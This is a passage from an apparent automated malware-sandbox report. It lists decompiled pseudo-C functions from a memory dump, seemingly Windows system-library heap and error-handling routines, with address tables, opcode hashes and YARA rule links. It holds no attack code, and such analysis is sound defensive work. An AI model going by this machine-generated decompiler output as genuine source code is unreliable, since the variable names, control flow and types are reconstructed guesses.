				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E009CEEF0(0xaa79a0);
					_t104 =  *0xaa8210; // 0x492c30
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E009CEB70(_t93, 0xaa79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E009F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E009CEEF0(0xaa79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E009CEB70(0, 0xaa79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x492c3d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E009EF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E009CEEF0(0xaa79a0);
									__eflags =  *0xaa8210 - _t104; // 0x492c30
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xaa8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00A34888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E009CEB70(_t95, 0xaa79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E009F95D0();
											L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E009F95D0();
											L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E009CEB70(_t93, 0xaa79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E009F95D0();
										L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E009F95D0();
										L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E009EF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                    0x009b52a5
                                                                                    0x009b52ad
                                                                                    0x009b52b0
                                                                                    0x009b52b3
                                                                                    0x009b52b7
                                                                                    0x009b52ba
                                                                                    0x009b52bf
                                                                                    0x009b52c4
                                                                                    0x009b52cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009b52ce
                                                                                    0x009b52d9
                                                                                    0x009b52dd
                                                                                    0x009b52e7
                                                                                    0x009b52f7
                                                                                    0x009b52f9
                                                                                    0x009b52fd
                                                                                    0x00a10dcf
                                                                                    0x00a10dd5
                                                                                    0x00a10dd6
                                                                                    0x00a10dd7
                                                                                    0x00a10dd8
                                                                                    0x00a10dd9
                                                                                    0x00a10dde
                                                                                    0x00a10ddf
                                                                                    0x00a10de0
                                                                                    0x00a10de1
                                                                                    0x00a10de2
                                                                                    0x00a10de5
                                                                                    0x00a10dea
                                                                                    0x00a10dec
                                                                                    0x00a10f60
                                                                                    0x00a10f64
                                                                                    0x00a10f70
                                                                                    0x00a10f76
                                                                                    0x00a10f79
                                                                                    0x00a10f79
                                                                                    0x00000000
                                                                                    0x00a10f64
                                                                                    0x00a10df2
                                                                                    0x00a10df7
                                                                                    0x00a10e04
                                                                                    0x00a10e0d
                                                                                    0x00a10e0d
                                                                                    0x00a10e10
                                                                                    0x00a10e1a
                                                                                    0x00a10e1c
                                                                                    0x00a10e4c
                                                                                    0x00a10e52
                                                                                    0x00a10e61
                                                                                    0x00a10e67
                                                                                    0x00a10e6b
                                                                                    0x00a10e70
                                                                                    0x00a10e76
                                                                                    0x00a10ed7
                                                                                    0x00a10edc
                                                                                    0x00a10ee0
                                                                                    0x00a10ee6
                                                                                    0x00a10eea
                                                                                    0x00a10eed
                                                                                    0x00a10ef0
                                                                                    0x00a10ef3
                                                                                    0x00a10ef6
                                                                                    0x00a10ef9
                                                                                    0x00a10efe
                                                                                    0x00a10f01
                                                                                    0x00a10f01
                                                                                    0x00a10f0b
                                                                                    0x00a10f12
                                                                                    0x00a10f16
                                                                                    0x00a10f18
                                                                                    0x00a10f1b
                                                                                    0x00a10f2c
                                                                                    0x00a10f31
                                                                                    0x00a10f31
                                                                                    0x00a10f35
                                                                                    0x00a10f39
                                                                                    0x00a10f3a
                                                                                    0x00a10f3c
                                                                                    0x00a10f3f
                                                                                    0x00a10f50
                                                                                    0x00a10f55
                                                                                    0x00a10f55
                                                                                    0x00a10f59
                                                                                    0x009b52eb
                                                                                    0x009b52f1
                                                                                    0x009b52f1
                                                                                    0x00a10e7d
                                                                                    0x00a10e84
                                                                                    0x00a10e88
                                                                                    0x00a10e8a
                                                                                    0x00a10e8d
                                                                                    0x00a10e9e
                                                                                    0x00a10ea3
                                                                                    0x00a10ea3
                                                                                    0x00a10ea7
                                                                                    0x00a10eaf
                                                                                    0x00a10eb3
                                                                                    0x00a10eb9
                                                                                    0x00a10eb9
                                                                                    0x00a10ebc
                                                                                    0x00a10ecd
                                                                                    0x00a10ecd
                                                                                    0x00000000
                                                                                    0x00a10eb3
                                                                                    0x00a10e21
                                                                                    0x00a10e2b
                                                                                    0x00a10e2f
                                                                                    0x00a10e30
                                                                                    0x00a10e3a
                                                                                    0x00a10e3f
                                                                                    0x00a10e41
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a10e47
                                                                                    0x00000000
                                                                                    0x00a10e47
                                                                                    0x00a10df9
                                                                                    0x00a10dfe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a10dfe
                                                                                    0x009b5303
                                                                                    0x009b5307
                                                                                    0x00000000
                                                                                    0x009b5309
                                                                                    0x00000000
                                                                                    0x009b5309
                                                                                    0x009b5307
                                                                                    0x009b52e9
                                                                                    0x009b52e9
                                                                                    0x00000000
                                                                                    0x009b52e9
                                                                                    0x009b530e
                                                                                    0x00000000

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0,I
                                                                                    • API String ID: 0-3978014232
                                                                                    • Opcode ID: bb1e81b33c8b5f0c796464d9110b4022fdb27591ac3c14d006647b0201f06f2d
                                                                                    • Instruction ID: a449f7ab7326d35e57130be9f5dba1842874a3168513b04e5091de9f7bb67f0e
                                                                                    • Opcode Fuzzy Hash: bb1e81b33c8b5f0c796464d9110b4022fdb27591ac3c14d006647b0201f06f2d
                                                                                    • Instruction Fuzzy Hash: 6251BB30149742AFC321DF68C942BABBBA4BF94710F144D1EF49587692E774E885CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A80EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E00A80EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(L00A7FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00A81074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = L009F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00A7A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00A7A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xaa8b04 >> 0x14) + (_v44 -  *0xaa8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E009D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00A7138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E009D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00A6FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xaa8724 & 0x00000008) != 0) {
						E00A752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00A815B5(0xaa8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                    0x00a80eb7
                                                                                    0x00a80eb9
                                                                                    0x00a80ec0
                                                                                    0x00a80ec2
                                                                                    0x00a80ecd
                                                                                    0x00a8105b
                                                                                    0x00a8105b
                                                                                    0x00a81061
                                                                                    0x00a81066
                                                                                    0x00a81066
                                                                                    0x00a8106b
                                                                                    0x00a81073
                                                                                    0x00a81073
                                                                                    0x00a80ed3
                                                                                    0x00a80ed6
                                                                                    0x00a80edc
                                                                                    0x00a80ee0
                                                                                    0x00a80ee7
                                                                                    0x00a80ef0
                                                                                    0x00a80ef5
                                                                                    0x00a80efa
                                                                                    0x00a80efc
                                                                                    0x00a80efd
                                                                                    0x00a80f03
                                                                                    0x00a80f04
                                                                                    0x00a80f06
                                                                                    0x00a80f07
                                                                                    0x00a80f09
                                                                                    0x00a80f0e
                                                                                    0x00a80f14
                                                                                    0x00a80f23
                                                                                    0x00a80f2d
                                                                                    0x00a80f34
                                                                                    0x00a80f34
                                                                                    0x00a80f14
                                                                                    0x00a80f52
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a80f58
                                                                                    0x00a80f73
                                                                                    0x00a80f74
                                                                                    0x00a80f79
                                                                                    0x00a80f7d
                                                                                    0x00a80f80
                                                                                    0x00a80f86
                                                                                    0x00a80fab
                                                                                    0x00a80fb5
                                                                                    0x00a80fc6
                                                                                    0x00a80fd1
                                                                                    0x00a80fe3
                                                                                    0x00a80fd3
                                                                                    0x00a80fdc
                                                                                    0x00a80fdc
                                                                                    0x00a80feb
                                                                                    0x00a81009
                                                                                    0x00a81009
                                                                                    0x00a81015
                                                                                    0x00a81027
                                                                                    0x00a81017
                                                                                    0x00a81020
                                                                                    0x00a81020
                                                                                    0x00a8102f
                                                                                    0x00a8103c
                                                                                    0x00a8103c
                                                                                    0x00a81048
                                                                                    0x00a81050
                                                                                    0x00a81050
                                                                                    0x00a81055
                                                                                    0x00000000
                                                                                    0x00a81055
                                                                                    0x00a80f88
                                                                                    0x00a80f9e
                                                                                    0x00a80fa2
                                                                                    0x00a80fa9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a80fa9
                                                                                    0x00000000

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `
                                                                                    • API String ID: 0-2679148245
                                                                                    • Opcode ID: 4f3f127064e5c8982f5cfd5f3349fb3ec6f9e542a8f2d4202f2ea04be272b943
                                                                                    • Instruction ID: 5bf6f621ab6be9466c729b611a2141b4926a90c3f30465c18df813ee76d97397
                                                                                    • Opcode Fuzzy Hash: 4f3f127064e5c8982f5cfd5f3349fb3ec6f9e542a8f2d4202f2ea04be272b943
                                                                                    • Instruction Fuzzy Hash: C75189702043429FD325EF28D981F1BB7E9ABC4704F14892DF99697291D671EC4ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E009EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E009D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E009F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E009F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E009F95D0();
							goto L11;
						} else {
							_t109 = L009D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E009FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E009F95D0();
										L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                    0x009ef0d3
                                                                                    0x009ef0d9
                                                                                    0x009ef0e0
                                                                                    0x009ef0e7
                                                                                    0x009ef0f2
                                                                                    0x009ef0f4
                                                                                    0x009ef0f8
                                                                                    0x009ef100
                                                                                    0x009ef108
                                                                                    0x009ef10d
                                                                                    0x009ef115
                                                                                    0x009ef116
                                                                                    0x009ef11f
                                                                                    0x009ef123
                                                                                    0x009ef124
                                                                                    0x009ef12c
                                                                                    0x009ef130
                                                                                    0x009ef134
                                                                                    0x009ef13d
                                                                                    0x009ef144
                                                                                    0x009ef14b
                                                                                    0x009ef152
                                                                                    0x00a2bab0
                                                                                    0x00a2bab0
                                                                                    0x009ef158
                                                                                    0x009ef158
                                                                                    0x009ef15a
                                                                                    0x009ef160
                                                                                    0x009ef165
                                                                                    0x009ef166
                                                                                    0x009ef16f
                                                                                    0x009ef173
                                                                                    0x00a2baa7
                                                                                    0x00a2baa7
                                                                                    0x00a2baab
                                                                                    0x00000000
                                                                                    0x009ef179
                                                                                    0x009ef18d
                                                                                    0x009ef191
                                                                                    0x00a2baa2
                                                                                    0x00000000
                                                                                    0x009ef197
                                                                                    0x009ef19b
                                                                                    0x009ef1a2
                                                                                    0x009ef1a9
                                                                                    0x009ef1af
                                                                                    0x009ef1b2
                                                                                    0x009ef1b6
                                                                                    0x009ef1b9
                                                                                    0x009ef1c4
                                                                                    0x009ef1d8
                                                                                    0x009ef1df
                                                                                    0x009ef1e3
                                                                                    0x009ef1eb
                                                                                    0x009ef1ee
                                                                                    0x009ef1f4
                                                                                    0x009ef20f
                                                                                    0x00a2bab7
                                                                                    0x00a2babb
                                                                                    0x00a2bacc
                                                                                    0x00a2bad1
                                                                                    0x009ef215
                                                                                    0x009ef218
                                                                                    0x009ef226
                                                                                    0x009ef22b
                                                                                    0x00000000
                                                                                    0x009ef22b
                                                                                    0x009ef1f6
                                                                                    0x009ef1f6
                                                                                    0x009ef1f9
                                                                                    0x009ef1fb
                                                                                    0x009ef1fb
                                                                                    0x009ef1f4
                                                                                    0x009ef191
                                                                                    0x009ef173
                                                                                    0x009ef152
                                                                                    0x009ef203

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                    • Instruction ID: 22719841df54bfbb2271098e2906ede857d6112ae070c83026b7e43c2b92a6b8
                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                    • Instruction Fuzzy Hash: 31516A725047149FC321DF19C841B6BB7F8FF88750F10892AFA9587691E7B4E904CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A33540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 525d11bbaebd5514ed24bc3b0917ee76b2840cdf924ad0f7cdfab11126982072
                                                                                    • Instruction ID: 2481122609e69067d062203b0f9707a43947b99fdd587928f87a0823722e75af
                                                                                    • Opcode Fuzzy Hash: 525d11bbaebd5514ed24bc3b0917ee76b2840cdf924ad0f7cdfab11126982072
                                                                                    • Instruction Fuzzy Hash: B34124B290552CAFDF21DB54CC86FAEB77CAB44714F0045A5FA09AB241DB709F888F94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A805AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `
                                                                                    • API String ID: 0-2679148245
                                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                    • Instruction ID: b87b913324c687eada90d1a9335cabfce5338b0795edb94be7a17c76733a8383
                                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                    • Instruction Fuzzy Hash: 6031E2322047056BE760EF24CD45F9B7BD9ABC4754F048239F9589B280E6B0ED18CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A33884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: 15129a05a7a8f0837b100a91cce1597115ccd019cc3ddb06b1ac4c00e4fd576e
                                                                                    • Instruction ID: 8ea9fbeb1a7c6e1fa2cadbcd214bd74fbe34594049916969a0a61c18b98b38de
                                                                                    • Opcode Fuzzy Hash: 15129a05a7a8f0837b100a91cce1597115ccd019cc3ddb06b1ac4c00e4fd576e
                                                                                    • Instruction Fuzzy Hash: C631E033909519EFEF15DB59C956F6BB774EB80B20F128169B914AB250D6709F00CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009ED294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 518c7cf7b5c5628eda24a3ff560ef03bbcb3e254ea5e545c08bbd686660e0ef0
                                                                                    • Instruction ID: 6c1b1f987925c2e13fe5747a884bb618fa29507f1f57814f716751fa47d57322
                                                                                    • Opcode Fuzzy Hash: 518c7cf7b5c5628eda24a3ff560ef03bbcb3e254ea5e545c08bbd686660e0ef0
                                                                                    • Instruction Fuzzy Hash: 9131CDB1509345AFC722DF29C981A6BBBE8EBC9758F10192EF99483250E634DD04CB93
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: WindowsExcludedProcs
                                                                                    • API String ID: 0-3583428290
                                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                    • Instruction ID: f759fbc6d3065b034d4e333888d7ee2782db6cdfbf48d9a392716df9b4665c5f
                                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                    • Instruction Fuzzy Hash: 6221F576A80228ABCB21DA55C840FAFB7BDAF86750F154429F9448B202D634DD0197A6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A68DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Critical error detected %lx, xrefs: 00A68E21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Critical error detected %lx
                                                                                    • API String ID: 0-802127002
                                                                                    • Opcode ID: 8935fd70182174fcdf5dce86aa622e7a5b8ba95a2c1f88cea4155d72c4c9cd5b
                                                                                    • Instruction ID: 21189904ecf57f142555662f05a38c383f923a95dff7270c5fec3a93d2a8d652
                                                                                    • Opcode Fuzzy Hash: 8935fd70182174fcdf5dce86aa622e7a5b8ba95a2c1f88cea4155d72c4c9cd5b
                                                                                    • Instruction Fuzzy Hash: B3113976D15348DBDF24CFA4960679CBBB4BB04714F20425DE529AB2C2C7754601CF14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A85BA5, Relevance: .6, Instructions: 592COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 009393d59dd5a6a349c27b8283f55c29d56d858bcab6694b14e105ddbb9ddbc5
                                                                                    • Instruction ID: 421081d1053bdf601468fbac0cf8a889c2447bfbd2687d82fb5ea8481987938e
                                                                                    • Opcode Fuzzy Hash: 009393d59dd5a6a349c27b8283f55c29d56d858bcab6694b14e105ddbb9ddbc5
                                                                                    • Instruction Fuzzy Hash: A3423975D00629CFDB24DF68C881BA9BBB1FF49304F1481AAD94DAB242E7749E85CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009D4120, Relevance: .4, Instructions: 444COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26f4df3bff63d780f6c4a14d5edf66a4d5155020490e43ef2ff5c454e4a8dfb3
                                                                                    • Instruction ID: 8be5634e007cad0330dc8b6e0137bc0263a87a145143389e9f6bee781b54caca
                                                                                    • Opcode Fuzzy Hash: 26f4df3bff63d780f6c4a14d5edf66a4d5155020490e43ef2ff5c454e4a8dfb3
                                                                                    • Instruction Fuzzy Hash: C3F17C706482118BCB24CF59C490A7AB7E5FF98714F14892EF896CB3A0E734DC95DB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

